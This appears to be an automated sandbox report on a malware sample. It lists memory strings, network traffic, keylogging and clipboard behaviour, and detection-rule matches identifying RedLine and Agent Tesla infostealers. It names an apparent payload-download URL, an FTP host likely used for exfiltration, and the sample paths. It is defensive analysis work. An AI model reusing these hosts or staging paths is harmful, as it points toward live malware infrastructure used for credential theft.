                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029D6E000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: x.exe, x.exe, 00000003.00000002.1753574596.0000000021905000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1759764048.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1752975519.0000000021700000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003028000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.000000000302C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000000.1719344100.0000000000416000.00000002.00000001.01000000.00000007.sdmp, xrbjyllC.pif, 0000000B.00000000.1826114660.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, sgxIb.exe, 0000000D.00000002.1890633912.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 0000000D.00000000.1888350846.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, xrbjyllC.pif, 00000011.00000002.2937816421.0000000025B6E000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000000.1995988945.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, 00000012.00000002.2055006675.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 00000012.00000000.2054308600.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe.9.dr, xrbjyllC.pif.3.drString found in binary or memory: http://www.pmail.com
                  Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/
                  Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/-
                  Source: Cllyjbrx.PIF, 00000010.00000002.2030287886.0000000020F7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmng
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngHA
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngZ
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmngy
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.0000000000669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com:443/origins/233_Cllyjbrxmng
                  Source: x.exe, 00000003.00000002.1721962152.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com:443/origins/233_CllyjbrxmngP
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                  Installs a global keyboard hook
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pifJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindow created: window name: CLIPBRDWNDCLASS
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 4888, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
